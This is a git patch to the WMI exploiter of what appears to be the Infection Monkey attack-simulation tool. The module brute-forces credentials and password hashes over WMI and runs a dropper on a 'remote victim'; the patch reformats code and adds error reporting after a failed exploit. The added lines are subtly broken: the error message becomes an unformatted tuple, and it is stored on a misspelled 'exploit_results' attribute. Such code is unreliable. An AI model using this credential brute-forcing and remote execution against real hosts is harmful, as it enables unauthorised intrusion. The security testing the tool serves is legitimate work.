From 54bbe8bf2f77dd9ec9df52ec91e0360ded28c15b Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Thu, 17 Mar 2022 12:46:08 -0400 Subject: [PATCH] Agent: Add WMI error message to results if exploit failed --- monkey/infection_monkey/exploit/wmiexec.py | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index a428a4759..bfa428856 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -29,10 +29,12 @@ class WmiExploiter(HostExploiter): def _exploit_host(self) -> ExploiterResultData: creds = generate_brute_force_combinations(self.options["credentials"]) - intp_creds = interruptable_iter(creds, - self.interrupt, - "WMI exploiter has been interrupted by a stop signal from the Island", - logging.INFO) + intp_creds = interruptable_iter( + creds, + self.interrupt, + "WMI exploiter has been interrupted by a stop signal from the Island", + logging.INFO, + ) for user, password, lm_hash, ntlm_hash in intp_creds: @@ -66,6 +68,8 @@ class WmiExploiter(HostExploiter): self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.exploit_result.exploitation_success = True + # TODO: This check is racey at best. Is it really necessary? If we execute an agent on + # the victim and there's one already running, it will stop itself. # query process list and check if monkey already running on victim process_list = WmiTools.list_object( wmi_connection, @@ -126,7 +130,7 @@ class WmiExploiter(HostExploiter): self.add_vuln_port(port="unknown") self.exploit_result.propagation_success = True else: - logger.debug( + error_message = ( "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, " "cmdline=%r)", remote_full_path, @@ -135,6 +139,8 @@ class WmiExploiter(HostExploiter): result.ReturnValue, cmdline, ) + logger.debug(error_message) + self.exploit_results.error_message = error_message result.RemRelease() wmi_connection.close()